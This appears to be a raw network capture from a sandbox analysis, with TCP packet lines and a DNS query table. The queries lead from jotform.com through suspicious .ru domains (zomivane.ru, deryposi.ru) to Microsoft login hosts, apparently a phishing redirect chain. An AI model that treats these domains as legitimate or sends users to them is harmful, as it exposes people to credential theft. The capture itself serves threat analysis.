                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.022797108 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.022810936 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.022866964 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024153948 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024195910 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024230957 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024240971 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024250031 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024537086 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024583101 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024599075 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024605989 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024641991 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024796009 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024837017 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024858952 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024871111 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024902105 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.024918079 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.025127888 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.025166035 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.025187016 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.025193930 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.025221109 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.025238037 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.025250912 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.025392056 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.026056051 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.026065111 CET44349715104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.026082993 CET49715443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.043751001 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.043817997 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.043872118 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.043893099 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.043906927 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.043945074 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069051027 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069068909 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069194078 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069212914 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069245100 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069259882 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069305897 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069324017 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069339991 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069366932 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069624901 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069643974 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069684029 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069696903 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069724083 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069911003 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069928885 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069982052 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.069998026 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.070301056 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.070319891 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.070354939 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.070369005 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.070394039 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.070553064 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.070570946 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.070602894 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.070615053 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.070636988 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.071080923 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.071095943 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.071155071 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.071170092 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.073307037 CET44349723104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.073712111 CET49723443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.073751926 CET44349723104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.075227976 CET44349723104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.075345039 CET49723443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.076510906 CET49723443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.076608896 CET44349723104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.076729059 CET49723443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.076745033 CET44349723104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.087713957 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.087778091 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.087853909 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.087894917 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.087924004 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.087981939 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088032961 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088051081 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088063955 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088107109 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088124990 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088197947 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088242054 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088264942 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088275909 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088303089 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088321924 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088443995 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088490963 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088516951 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088527918 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088553905 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088572025 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088654041 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088697910 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088722944 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088733912 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088762999 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.088779926 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.089198112 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.089253902 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.089296103 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.089307070 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.089332104 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.089668036 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.089715004 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.089740038 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.089751959 CET44349719172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.089782953 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.089807987 CET49719443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.107487917 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.107507944 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.107574940 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.107633114 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.107662916 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.107664108 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.107683897 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.107717037 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.107857943 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.107872009 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.107925892 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.107942104 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108171940 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108190060 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108226061 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108239889 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108268023 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108475924 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108489037 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108530998 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108550072 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108572960 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108776093 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108797073 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108833075 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108846903 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.108871937 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109064102 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109088898 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109134912 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109148979 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109173059 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109348059 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109371901 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109404087 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109417915 CET44349718104.22.72.81192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109441042 CET49718443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109497070 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109519958 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109566927 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109580994 CET44349716172.67.7.107192.168.2.17
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.109606981 CET49716443192.168.2.17172.67.7.107
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.119355917 CET49723443192.168.2.17104.22.72.81
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:57.125987053 CET44349724104.19.128.105192.168.2.17
                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:54.276335001 CET192.168.2.171.1.1.10xdfecStandard query (0)eu.jotform.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:54.276477098 CET192.168.2.171.1.1.10x8ceStandard query (0)eu.jotform.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.365459919 CET192.168.2.171.1.1.10xfaeeStandard query (0)cdn.jotfor.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.365681887 CET192.168.2.171.1.1.10x78daStandard query (0)cdn.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.366379023 CET192.168.2.171.1.1.10x5c97Standard query (0)cdn02.jotfor.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.366647005 CET192.168.2.171.1.1.10xcaf7Standard query (0)cdn02.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.367038965 CET192.168.2.171.1.1.10xcb2fStandard query (0)cdn03.jotfor.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.367279053 CET192.168.2.171.1.1.10xfac1Standard query (0)cdn03.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.367748976 CET192.168.2.171.1.1.10xdd99Standard query (0)cdn01.jotfor.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.368015051 CET192.168.2.171.1.1.10xc17eStandard query (0)cdn01.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.985034943 CET192.168.2.171.1.1.10x77cStandard query (0)cdn02.jotfor.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.985219955 CET192.168.2.171.1.1.10xfcacStandard query (0)cdn02.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.988504887 CET192.168.2.171.1.1.10x5b95Standard query (0)js.jotform.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.988653898 CET192.168.2.171.1.1.10xa1cbStandard query (0)js.jotform.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.588761091 CET192.168.2.171.1.1.10x387cStandard query (0)cdn03.jotfor.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.588942051 CET192.168.2.171.1.1.10x74f5Standard query (0)cdn03.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.631405115 CET192.168.2.171.1.1.10xa566Standard query (0)js.jotform.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.631556034 CET192.168.2.171.1.1.10xf8b4Standard query (0)js.jotform.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.767229080 CET192.168.2.171.1.1.10x8ac4Standard query (0)cdn01.jotfor.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.767447948 CET192.168.2.171.1.1.10xa961Standard query (0)cdn01.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:58.267538071 CET192.168.2.171.1.1.10x3f3eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:58.267844915 CET192.168.2.171.1.1.10xfeefStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:59.362467051 CET192.168.2.171.1.1.10x7a5aStandard query (0)o61806.ingest.sentry.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:59.362627029 CET192.168.2.171.1.1.10xad46Standard query (0)o61806.ingest.sentry.io65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:59.651159048 CET192.168.2.171.1.1.10x293Standard query (0)eu.jotform.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:59.652123928 CET192.168.2.171.1.1.10xb5b1Standard query (0)eu.jotform.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:59.968373060 CET192.168.2.171.1.1.10x3249Standard query (0)o61806.ingest.sentry.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:59.968374014 CET192.168.2.171.1.1.10x856cStandard query (0)o61806.ingest.sentry.io65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:00.004740953 CET192.168.2.171.1.1.10x8a3aStandard query (0)eu-files.jotform.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:00.005076885 CET192.168.2.171.1.1.10x3be7Standard query (0)eu-files.jotform.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:00.789037943 CET192.168.2.171.1.1.10x9563Standard query (0)eu-files.jotform.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:00.789154053 CET192.168.2.171.1.1.10x66c9Standard query (0)eu-files.jotform.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:01.425143003 CET192.168.2.171.1.1.10x48d2Standard query (0)cdn.jotfor.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:01.425256968 CET192.168.2.171.1.1.10x761bStandard query (0)cdn.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:19.125803947 CET192.168.2.171.1.1.10xd668Standard query (0)events.jotform.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:19.125998020 CET192.168.2.171.1.1.10x4628Standard query (0)events.jotform.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:19.147939920 CET192.168.2.171.1.1.10x6360Standard query (0)www.jotform.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:19.148071051 CET192.168.2.171.1.1.10xc66cStandard query (0)www.jotform.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:32.341622114 CET192.168.2.171.1.1.10x27c4Standard query (0)dm9h.zomivane.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:32.341775894 CET192.168.2.171.1.1.10x75b7Standard query (0)dm9h.zomivane.ru65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.930555105 CET192.168.2.171.1.1.10x5ce3Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.930919886 CET192.168.2.171.1.1.10x5b80Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.931488991 CET192.168.2.171.1.1.10x7558Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.931627035 CET192.168.2.171.1.1.10xa7b0Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.931905031 CET192.168.2.171.1.1.10xe0f6Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.932030916 CET192.168.2.171.1.1.10x40bdStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:34.641119003 CET192.168.2.171.1.1.10x4403Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:34.641263008 CET192.168.2.171.1.1.10xe5e2Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:34.712825060 CET192.168.2.171.1.1.10x485bStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:34.712987900 CET192.168.2.171.1.1.10xc42fStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:35.243119001 CET192.168.2.171.1.1.10xac97Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:35.243240118 CET192.168.2.171.1.1.10x6041Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:35.257143021 CET192.168.2.171.1.1.10x23d9Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:35.257328987 CET192.168.2.171.1.1.10x369Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:37.219386101 CET192.168.2.171.1.1.10x1ce3Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:37.219633102 CET192.168.2.171.1.1.10x10b4Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:44.342665911 CET192.168.2.171.1.1.10x1a33Standard query (0)sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:44.342796087 CET192.168.2.171.1.1.10x3480Standard query (0)sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:46.012741089 CET192.168.2.171.1.1.10x76f8Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:46.012965918 CET192.168.2.171.1.1.10x28c4Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:46.015073061 CET192.168.2.171.1.1.10xf7f4Standard query (0)sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:46.015338898 CET192.168.2.171.1.1.10xa890Standard query (0)sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:47.105767012 CET192.168.2.171.1.1.10xda8aStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:47.105994940 CET192.168.2.171.1.1.10xac44Standard query (0)www.office.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:49.167100906 CET192.168.2.171.1.1.10x27ddStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:49.167253017 CET192.168.2.171.1.1.10xf5beStandard query (0)www.office.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:50.281306982 CET192.168.2.171.1.1.10xcb00Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:50.281603098 CET192.168.2.171.1.1.10x8772Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:32.716653109 CET192.168.2.171.1.1.10x4653Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
